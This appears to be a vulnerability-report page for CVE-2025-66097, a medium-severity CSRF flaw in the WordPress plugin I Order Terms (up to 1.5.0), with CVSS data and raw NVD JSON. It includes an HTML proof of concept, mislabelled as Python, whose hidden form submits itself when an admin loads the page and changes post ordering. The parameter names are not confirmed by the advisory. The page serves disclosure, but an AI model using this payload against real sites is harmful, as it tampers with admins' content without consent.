Security Vulnerability Report
中文
CVE-2025-66097 CVSS 4.3 MEDIUM

CVE-2025-66097

Published: 2025-11-21 13:15:51
Last Modified: 2026-04-27 18:16:35

Description

Cross-Site Request Forgery (CSRF) vulnerability in Igor Jerosimić I Order Terms i-order-terms allows Cross Site Request Forgery.This issue affects I Order Terms: from n/a through <= 1.5.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

I Order Terms <= 1.5.0
I Order Terms 从 n/a 版本至 1.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-66097 - I Order Terms Plugin --> <!-- This PoC demonstrates how an attacker can modify post ordering via CSRF attack --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-66097</title> <style> body { font-family: Arial, sans-serif; padding: 20px; } .malicious-form { display: none; } </style> </head> <body> <h1>CVE-2025-66097 CSRF PoC</h1> <p>WordPress I Order Terms Plugin <= 1.5.0 CSRF Vulnerability</p> <!-- Hidden malicious form that auto-submits --> <form id="csrfForm" class="malicious-form" action="http://target-site.com/wp-admin/admin-ajax.php" method="POST"> <!-- I Order Terms plugin action --> <input type="hidden" name="action" value="iot_update_post_order"> <!-- Post ID to modify --> <input type="hidden" name="post_id" value="1"> <!-- Malicious order value --> <input type="hidden" name="menu_order" value="9999"> <!-- Security nonce (if implemented, would need to be obtained) --> <!-- <input type="hidden" name="nonce" value="obtained_nonce"> --> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); // Log submission for testing purposes console.log('CSRF PoC submitted for CVE-2025-66097'); </script> <p><strong>Note:</strong> This PoC is for educational and security testing purposes only.</p> <p>Attack scenario: When a logged-in WordPress admin visits this page, the form will automatically submit and modify the post ordering.</p> </body> </html> <!-- Alternative: Image-based GET request PoC (for simpler scenarios) --> <!-- <img src="http://target-site.com/wp-admin/admin-ajax.php?action=iot_update_post_order&post_id=1&menu_order=9999" width="0" height="0" border="0"> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66097", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:51.180", "lastModified": "2026-04-27T18:16:35.477", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Igor Jerosimić I Order Terms i-order-terms allows Cross Site Request Forgery.This issue affects I Order Terms: from n/a through <= 1.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/i-order-terms/vulnerability/wordpress-i-order-terms-plugin-1-5-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}